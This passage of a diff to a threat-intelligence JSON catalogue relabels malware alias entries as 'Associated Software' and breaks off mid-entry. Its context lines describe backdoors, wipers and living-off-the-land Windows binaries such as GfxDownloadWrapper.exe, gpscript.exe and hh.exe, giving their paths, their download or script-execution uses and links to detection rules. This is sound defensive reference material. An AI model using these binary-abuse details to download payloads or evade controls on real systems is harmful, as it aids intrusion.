"[Gazer](https://app.tidalcyber.com/software/7a60b984-b0c8-4acc-be24-841f4b652872) is a backdoor used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) since at least 2016. [[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]", @@ -11345,7 +11345,7 @@ } ], "uuid": "b270fcf2-72ea-41c5-89fe-addb6cefd547", - "value": "Gelsevirine" + "value": "Gelsevirine - Associated Software" }, { "description": "[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", @@ -11359,7 +11359,7 @@ } ], "uuid": "86499f47-083e-47a5-ad8c-032f54f26359", - "value": "Gelsenicine" + "value": "Gelsenicine - Associated Software" }, { "description": "[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", @@ -11373,7 +11373,7 @@ } ], "uuid": "2f00732c-43a7-4253-a5eb-990d8466eb01", - "value": "Gelsemine" + "value": "Gelsemine - Associated Software" }, { "description": "[Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) has been used by the Gelsemium group since at least 2014.[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", @@ -11475,7 +11475,7 @@ } ], "uuid": "396335cb-1404-44f1-9d73-387e468bc781", - "value": "GfxDownloadWrapper.exe" + "value": "GfxDownloadWrapper.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.\n\n**Author:** Jesus Galvez\n\n**Paths:**\n* c:\\windows\\system32\\driverstore\\filerepository\\64kb6472.inf_amd64_3daef03bbe98572b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_0e9c57ae3396e055\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_209bd95d56b1ac2d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_3fa2a843f8b7f16d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_85c860f05274baa0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_f7412e3e3404de80\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_feb9f1cf05b0de58\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_component.inf_amd64_0219cc1c7085a93f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_component.inf_amd64_df4f60b1cae9b14a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_16eb18b0e2526e57\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_1c77f1231c19bc72\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_31c60cc38cfcca28\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_82f69cea8b2d928f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_0606619cc97463de\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_0e95edab338ad669\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_22aac1442d387216\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_2461d914696db722\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_29d727269a34edf5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_2caf76dbce56546d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_353320edb98da643\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_4ea0ed0af1507894\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_56a48f4f1c2da7a7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_64f23fdadb76a511\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_668dd0c6d3f9fa0e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_6be8e5b7f731a6e5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_6dad7e4e9a8fa889\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_6df442103a1937a4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_767e7683f9ad126c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_8644298f665a12c4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_868acf86149aef5d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_92cf9d9d84f1d3db\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_93239c65f222d453\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_9de8154b682af864\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_a7428663aca90897\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_ad7cb5e55a410add\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_afbf41cf8ab202d7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_d193c96475eaa96e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_db953c52208ada71\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_e7523682cc7528cc\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_e9f341319ca84274\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_f3a64c75ee4defb7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_f51939e52b944f4b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch_comp.inf_amd64_4938423c9b9639d7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch_comp.inf_amd64_deecec7d232ced2b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_01ee1299f4982efe\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_02edfc87000937e4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0541b698fc6e40b0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0707757077710fff\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0b3e3ed3ace9602a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0cff362f9dff4228\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_16ed7d82b93e4f68\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1a33d2f73651d989\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1aca2a92a37fce23\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1af2dd3e4df5fd61\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1d571527c7083952\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_23f7302c2b9ee813\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_24de78387e6208e4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_250db833a1cd577e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_25e7c5a58c052bc5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_28d80681d3523b1c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_2dda3b1147a3a572\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_31ba00ea6900d67d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_329877a66f240808\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_42af9f4718aa1395\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_4645af5c659ae51a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_48c2e68e54c92258\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_48e7e903a369eae2\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_491d20003583dabe\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_4b34c18659561116\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_51ce968bf19942c2\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_555cfc07a674ecdd\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_561bd21d54545ed3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_579a75f602cc2dce\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_57f66a4f0a97f1a3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_587befb80671fb38\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_62f096fe77e085c0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_6ae0ddbb4a38e23c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_6bb02522ea3fdb0d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_6d34ac0763025a06\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_712b6a0adbaabc0a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_78b09d9681a2400f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_842874489af34daa\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_88084eb1fe7cebc3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_89033455cb08186f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_8a9535cd18c90bc3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_8c1fc948b5a01c52\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_9088b61921a6ff9f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_90f68cd0dc48b625\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_95cb371d046d4b4c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_a58de0cf5f3e9dca\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_abe9d37302f8b1ae\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_acb3edda7b82982f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_aebc5a8535dd3184\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_b5d4c82c67b39358\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_b846bbf1e81ea3cf\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_babb2e8b8072ff3b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_bc75cebf5edbbc50\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_be91293cf20d4372\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c11f4d5f0bc4c592\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c4e5173126d31cf0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c4f600ffe34acc7b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c8634ed19e331cda\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c9081e50bcffa972\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_ceddadac8a2b489e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_d4406f0ad6ec2581\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_d5877a2e0e6374b6\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_d8ca5f86add535ef\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_e8abe176c7b553b5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_eabb3ac2c517211f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_f8d8be8fea71e1a0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_fe5e116bb07c0629\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_fe73d2ebaa05fb95\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\\\n* c:\\windows\\system32\\driverstore\\filerepository\\k127153.inf_amd64_364f43f2a27f7bd7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\k127153.inf_amd64_3f3936d8dec668b8\\\n* c:\\windows\\system32\\driverstore\\filerepository\\k127793.inf_amd64_3ab7883eddccbf0f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129523.inf_amd64_32947eecf8f3e231\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126950.inf_amd64_fa7f56314967630d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126951.inf_amd64_94804e3918169543\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126973.inf_amd64_06dde156632145e3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126974.inf_amd64_9168fc04b8275db9\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127005.inf_amd64_753576c4406c1193\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127018.inf_amd64_0f67ff47e9e30716\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127021.inf_amd64_0d68af55c12c7c17\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127171.inf_amd64_368f8c7337214025\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127176.inf_amd64_86c658cabfb17c9c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127390.inf_amd64_e1ccb879ece8f084\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127678.inf_amd64_8427d3a09f47dfc1\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127727.inf_amd64_cf8e31692f82192e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127807.inf_amd64_fc915899816dbc5d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127850.inf_amd64_6ad8d99023b59fd5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki128602.inf_amd64_6ff790822fd674ab\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki128916.inf_amd64_3509e1eb83b83cfb\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129407.inf_amd64_f26f36ac54ce3076\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129633.inf_amd64_d9b8af875f664a8c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129866.inf_amd64_e7cdca9882c16f55\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130274.inf_amd64_bafd2440fa1ffdd6\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130350.inf_amd64_696b7c6764071b63\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130409.inf_amd64_0d8d61270dfb4560\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130471.inf_amd64_26ad6921447aa568\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130624.inf_amd64_d85487143eec5e1a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130825.inf_amd64_ee3ba427c553f15f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130871.inf_amd64_382f7c369d4bf777\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131064.inf_amd64_5d13f27a9a9843fa\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131176.inf_amd64_fb4fe914575fdd15\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131191.inf_amd64_d668106cb6f2eae0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131622.inf_amd64_0058d71ace34db73\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132032.inf_amd64_f29660d80998e019\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132337.inf_amd64_223d6831ffa64ab1\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132535.inf_amd64_7875dff189ab2fa2\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132544.inf_amd64_b8c1f31373153db4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132574.inf_amd64_54c9b905b975ee55\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132869.inf_amd64_052eb72d070df60f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\kit126731.inf_amd64_1905c9d5f38631d9\\\n\n**Resources:**\n* [https://www.sothis.tech/author/jgalvez/](https://www.sothis.tech/author/jgalvez/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml)\n* IOC: [Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.](Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.)[[GfxDownloadWrapper.exe - LOLBAS Project](/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]", @@ -11515,7 +11515,7 @@ } ], "uuid": "f1c8627e-d1bb-4a15-997c-08d5c8626718", - "value": "Moudoor" + "value": "Moudoor - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -11529,7 +11529,7 @@ } ], "uuid": "d468e609-3469-4308-9fb9-b6ca8655a1b6", - "value": "Mydoor" + "value": "Mydoor - Associated Software" }, { "description": "[gh0st RAT](https://app.tidalcyber.com/software/269ef8f5-35c8-44ba-afe4-63f4c6431427) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.[[FireEye Hacking Team](https://app.tidalcyber.com/references/c1e798b8-6771-4ba7-af25-69c640321e40)][[Arbor Musical Chairs Feb 2018](https://app.tidalcyber.com/references/bddf44bb-7a0a-498b-9831-7b73cf9a582e)][[Nccgroup Gh0st April 2018](https://app.tidalcyber.com/references/4476aa0a-b1ef-4ac6-9e44-5721a0b3e92b)]", @@ -11612,7 +11612,7 @@ } ], "uuid": "b7246af4-31b1-42b4-aafd-853a5fd9fbbf", - "value": "Trojan.GTALK" + "value": "Trojan.GTALK - Associated Software" }, { "description": "[GLOOXMAIL](https://app.tidalcyber.com/software/09fdec78-5253-433d-8680-294ba6847be9) is malware used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) that mimics legitimate Jabber/XMPP traffic. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", @@ -11765,7 +11765,7 @@ } ], "uuid": "c3ca0824-88bf-4489-bd93-7598044d1088", - "value": "SUNSHUTTLE" + "value": "SUNSHUTTLE - Associated Software" }, { "description": "[GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a), and has likely been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least mid-2019. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)][[FireEye SUNSHUTTLE Mar 2021](https://app.tidalcyber.com/references/1cdb8a1e-fbed-4db3-b273-5f8f45356dc1)][[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", @@ -11842,7 +11842,7 @@ } ], "uuid": "34cc45e9-f8c3-4b2d-b8b5-ace1aec167b2", - "value": "Gpscript.exe" + "value": "Gpscript.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by group policy to process scripts\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\gpscript.exe\n* C:\\Windows\\SysWOW64\\gpscript.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/](https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_gpscript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml)\n* IOC: Scripts added in local group policy\n* IOC: Execution of Gpscript.exe after logon[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]", @@ -12210,7 +12210,7 @@ } ], "uuid": "cd5e2212-64ec-4bf0-a533-6143542c8df5", - "value": "HammerDuke" + "value": "HammerDuke - Associated Software" }, { "description": "", @@ -12224,7 +12224,7 @@ } ], "uuid": "44c91046-4527-471e-b0d4-a83660594c93", - "value": "NetDuke" + "value": "NetDuke - Associated Software" }, { "description": "[HAMMERTOSS](https://app.tidalcyber.com/software/cc07f03f-9919-4856-9b30-f4d88940b0ec) is a backdoor that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2015. [[FireEye APT29](https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)] [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", @@ -12274,7 +12274,7 @@ } ], "uuid": "0616b745-4181-419f-b723-d60034b7c1b5", - "value": "Chanitor" + "value": "Chanitor - Associated Software" }, { "description": "[Hancitor](https://app.tidalcyber.com/software/4eee3272-07fa-48ee-a7b9-9dfee3e4550a) is a downloader that has been used by [Pony](https://app.tidalcyber.com/software/555b612e-3f0d-421d-b2a7-63eb2d1ece5f) and other information stealing malware.[[Threatpost Hancitor](https://app.tidalcyber.com/references/70ad77af-88aa-4f06-a9cb-df9608157841)][[FireEye Hancitor](https://app.tidalcyber.com/references/65a07c8c-5b29-445f-8f01-6e577df4ea62)]", @@ -12431,7 +12431,7 @@ } ], "uuid": "69aa0c3f-0b9e-44f5-b1fe-0b155cff0a5f", - "value": "Custom HDoor" + "value": "Custom HDoor - Associated Software" }, { "description": "[HDoor](https://app.tidalcyber.com/software/f155b6f9-258d-4446-8867-fe5ee26d8c72) is malware that has been customized and used by the [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) group. [[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]", @@ -12535,7 +12535,7 @@ } ], "uuid": "5375e2bd-be8e-4c7b-8173-74ff4f3598b4", - "value": "DriveSlayer" + "value": "DriveSlayer - Associated Software" }, { "description": "[[CISA AA22-057A Destructive Malware February 2022](https://app.tidalcyber.com/references/18684085-c156-4610-8b1f-cc9646f2c06e)][[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)]", @@ -12549,7 +12549,7 @@ } ], "uuid": "85c3ad5c-ab5d-47b7-ba05-88daf017f1bd", - "value": "Trojan.Killdisk" + "value": "Trojan.Killdisk - Associated Software" }, { "description": "[HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.[[SentinelOne Hermetic Wiper February 2022](https://app.tidalcyber.com/references/96825555-1936-4ee3-bb25-423dc16a9116)][[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)][[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)][[ESET Hermetic Wiper February 2022](https://app.tidalcyber.com/references/07ef66e8-195b-4afe-a518-ce9e77220038)][[Qualys Hermetic Wiper March 2022](https://app.tidalcyber.com/references/2b25969b-2f0b-4204-9277-596e80c4e626)]", @@ -12649,7 +12649,7 @@ } ], "uuid": "8e6a3da3-bab4-40d8-b501-b6a986cbf2df", - "value": "Hh.exe" + "value": "Hh.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used for processing chm files in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\hh.exe\n* C:\\Windows\\SysWOW64\\hh.exe\n\n**Resources:**\n* [https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/](https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/)\n\n**Detection:**\n* Sigma: [proc_creation_win_hh_chm_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml)\n* Sigma: [proc_creation_win_hh_html_help_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml)\n* Elastic: [execution_via_compiled_html_file.toml](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml)\n* Elastic: [execution_html_help_executable_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml)\n* Splunk: [detect_html_help_spawn_child_process.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml)\n* Splunk: [detect_html_help_url_in_command_line.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml)[[Hh.exe - LOLBAS Project](/references/4e09bfcf-f5be-46c5-9ebf-8742ac8d1edc)]", @@ -12898,7 +12898,7 @@ } ], "uuid": "033ae561-8c4e-4b67-995b-b408c39a5c31", - "value": "HUC Packet Transmit Tool" + "value": "HUC Packet Transmit Tool - Associated Software" }, { "description": "[HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. [[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)][[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]", @@ -12949,7 +12949,7 @@ } ], "uuid": "e0a43dd6-f2c2-4468-bbb8-7413097b6cf3", - "value": "Token Control" + "value": "Token Control - Associated Software" }, { "description": "[[ThreatConnect 